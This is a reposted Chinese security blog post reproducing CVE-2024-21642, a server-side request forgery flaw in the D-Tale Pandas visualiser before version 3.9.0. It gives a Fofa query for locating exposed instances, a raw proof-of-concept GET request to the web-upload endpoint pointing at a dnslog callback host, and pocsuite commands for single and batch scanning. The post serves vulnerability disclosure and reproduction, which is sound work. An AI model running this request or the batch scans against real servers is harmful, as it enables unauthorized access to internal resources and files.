（CVE-2024-21642）D-Tale SSRF漏洞（附POC）

渗透技巧 10个月前 admin

76 0 0

免责声明：该公众号大部分文章来自作者日常学习，也有部分文章是经过作者授权和其他公众号白名单转载，如需转载，请联系公众号。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

0x01 前言

D-Tale 是 Pandas 数据结构的可视化工具。3.9.0 之前的 D-Tale 版本的用户可能容易受到服务器端请求伪造 (SSRF) 的攻击，从而使攻击者能够访问服务器上的文件。

0x02 影响平台

D-Tale < v3.9.0

0x03 漏洞复现

Fofa："dtale/static/images/favicon.png"

首页：

（CVE-2024-21642）D-Tale SSRF漏洞（附POC）

左侧加载数据功能的从网上加载选项存在SSRF漏洞

（CVE-2024-21642）D-Tale SSRF漏洞（附POC）

GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fcve-2024-21642.s5wlhi.dnslog.cn HTTP/1.1Host: Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: close

查看dnslog记录

（CVE-2024-21642）D-Tale SSRF漏洞（附POC）

0x04 修复建议

关注厂商更新产品：https://github.com/man-group/dtale

‍‍0x05 参考链接

https://nvd.nist.gov/vuln/detail/CVE-2024-21642

‍

关注公众号回复CVE-2024-21642获取Pocsuite框架POC

使用方法：pocsuite -r CVE-2024-21642.py -u [url]

pocsuite3安装(python3环境)pip3 install pocsuite3设置代理pocsuite -r POC.py -u [url] --proxy http://IP:PORT批量验证pocsuite -r POC.py -f [file.txt]

原文始发于微信公众号（SheYin）：（CVE-2024-21642）D-Tale SSRF漏洞（附POC）

版权声明：admin 发表于 2024年1月22日上午8:41。
转载请注明：（CVE-2024-21642）D-Tale SSRF漏洞（附POC） | CTF导航

高版本glibc堆的几种利用手法

admin

993

PhantomJS 图像渲染中的 XSS 漏洞升级为 SSRF/本地文件读取漏洞

admin

VMware Tools本地提权漏洞CVE-2022-31676分析与复现（1）

admin

548

每日安全动态推送(8-20)

admin

CVE-2021-40449(UAF)学习

admin

859

从NTAuthCertificates证书伪造到内网穿透实践与思路

admin

（CVE-2024-21642）D-Tale SSRF漏洞（附POC）

第五节：云上容器安全威胁（二）执行

Cellinx 摄像机 uac.cgi 未授权添加用户漏洞

相关文章

相关文章

（CVE-2024-21642）D-Tale SSRF漏洞（附POC）

第五节：云上容器安全威胁（二）执行

Cellinx 摄像机 uac.cgi 未授权添加用户漏洞

相关文章

广告位

相关文章